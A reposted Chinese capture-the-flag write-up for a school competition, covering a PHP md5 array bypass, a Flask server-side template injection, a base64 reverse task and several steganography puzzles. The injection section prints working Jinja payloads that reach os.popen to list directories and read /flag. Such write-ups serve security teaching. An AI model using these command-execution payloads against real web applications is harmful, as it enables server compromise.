IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> 新春杯八校联赛 -> 正文阅读

[PHP知识库]新春杯八校联赛

原比赛wp:腾讯文档

新春杯

WEB

题目一:一行代码的签到

题目源码:


 <?php
//只有一行的签到
echo !(!(include "flag.php")||(!error_reporting(0))||!isset($_GET['BYE'])||!isset($_GET['HELLO'])||($_GET['BYE']==2021)||!(intval($_GET['BYE'][0])==2021)||$_GET['HELLO']==$_GET['BYE']||!(md5($_GET['HELLO'])==md5($_GET['BYE'])))?$flag:str_repeat(highlight_file(__FILE__), 0);

知识点:

intval函数特性:intval() 函数用于获取变量的整数值

md5数组绕过:md5不能加密数组,传入数组会报错,但会继续执行并且返回结果为null

弱类型比较(==),只判断内容是否相等,如果是字符串类型,则转换成数值型后进行判断

三目运算符:echo !()?xxx:yyy,若为true则用echo xxx,若为false则echo yyy.

||连接各个条件

分析

整个条件

!(!(include "flag.php")||(!error_reporting(0))||!isset($_GET['BYE'])||!isset($_GET['HELLO'])||($_GET['BYE']==2021)||!(intval($_GET['BYE'][0])==2021)||$_GET['HELLO']==$_GET['BYE']||!(md5($_GET['HELLO'])==md5($_GET['BYE'])))

因为需要整个条件为真才输出flag,可以看见括号最前面加上了!,就需要括号里面的条件为假

1.($_GET['BYE']==2021)==>BYE不能为2021

2.!(intval($_GET['BYE'][0])==2021)==>BYE的整数值为2021

3.$_GET['HELLO']==$_GET['BYE']==>HELLO和BYE变量不能相等

4.!(md5($_GET['HELLO'])==md5($_GET['BYE']))==>在HELLO和BYE变量后加上[],变成数组,即null=null,绕过

payload:

?HELLO[]=2021A&BYE[]=2021a

题目二 e4zy_flask

Hint:/admin?name=1 https://xz.aliyun.com/t/8029#toc-8

进入页面

转到admin页面

/admin

get传参发现可以ssti

/admin?name=49

?

看看根目录

admin/?name={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}}

?发现有flag

?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20/flag%27).read()%20}}

?flag

flag{SST1_YoU_kNow_1t_A1way5_5O_Easy}

题目三 baby_SQL

题目四 TP_serialize

REVERSE

题目一 RE Check In

?IDA打开flag.exe,发现main函数里有串字符串

BASE64解码得到flag

题目二 Easy RE

题目三 Dynamic Reverse

MISC

题目一 享受美妙的音乐吧

解压文件得到一个wav音频和一个压缩包,压缩包有密码,先看音频

放到Audacity看,没发现什么

然后发现是sstv转图片,先切换输出设备,再打开sstv转图片

发现图片上的字“我磕的CP是最甜的!”,是压缩包密码,解压出音频

听了发现是一首歌,放到Audacity看,同样没啥东西

那就应该是隐藏了文件,找下看 ,DeepSound找到里面有个txt

打开看到最后有个零,而且列数很多,应该是零宽隐写

解密网址解密得到flag

题目二 超简单

用的ps拼接二维码,扫出来得到一串字符

V20xNGFGb3pkSE5qTVRoNFpFWTVlbVJZUW14amJEbDZZVmN4ZDJKSFZTOW1VVDA5

三次BASE64,得到flag:flag{ls_1t_super_simple?}

题目三 来个套餐

解压文件,得到一个hint.txt和一个带密码的压缩包

看看hint.txt,看起来像是爆破压缩包的字典,试试

爆破成功,解压压缩包

培根密码

解密大写解压错误,小写解压成功,tiersxqxyhdcbsnervfy

解压

Ook解密

解压得到一张图

放到010里看

看属性,发现flag:flag{He110_everyone_1m#tired@of_Amway}

题目四 今天也是爱阿瑶的一天呀

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2022-02-16 12:50:44  更:2022-02-16 12:51:44 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/27 4:34:25-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码
数据统计